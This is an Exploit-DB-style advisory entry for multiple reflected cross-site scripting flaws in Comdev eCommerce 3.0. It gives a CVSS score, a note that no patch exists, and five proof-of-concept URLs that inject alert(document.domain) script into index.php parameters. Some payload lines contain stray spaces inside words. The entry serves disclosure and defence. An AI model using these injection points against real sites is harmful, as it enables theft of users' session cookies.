Multiple Cross-Site Scripting Vulnerabilities in Comdev eCommerce

vendor:

eCommerce

by:

Unknown

5.5

CVSS

MEDIUM

Cross-Site Scripting

CWE

Product Name: eCommerce

Affected Version From: 3

Affected Version To: 3

Patch Exists: NO

Related CWE:

CPE: comdev:ecommerce

Metasploit:

Other Scripts:

Platforms Tested:

Unknown

Multiple Cross-Site Scripting Vulnerabilities in Comdev eCommerce

Comdev eCommerce is reported prone to multiple cross-site scripting vulnerabilities. These vulnerabilities can be exploited to steal cookie-based authentication credentials and carry out other attacks.

Mitigation:

Unknown

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/12382/info

Comdev eCommerce is reported prone to multiple cross-site scripting vulnerabilities. These may facilitate theft of cookie-based authentication credentials as well as other attacks.

Comdev eCommerce 3.0 is reported prone to these issues. It is likely that previous versions are vulnerable as well. 

index.php?product_id=477&pageactionprev=viewpricelist&sta rt=0"><script>alert(document.domain);</script>&category_id=&keyword=
index.php?product_id=477&pageactionprev=viewpricelist&start=0&category_id="><script>alert(document.d omain);</script>&keyword=
index.php?product_id=477&pageactionprev=viewpricelist&start=0&category_id=&keyword="><script>alert(document.domain);</script>
index.php?pageac tion=viewpricelist"><script>alert(document.domain);</script>
index.php?product_id=477"><script>alert(document.domain);</script>&pageactionprev=viewpricelist&start=0&cate gory_id=&keyword=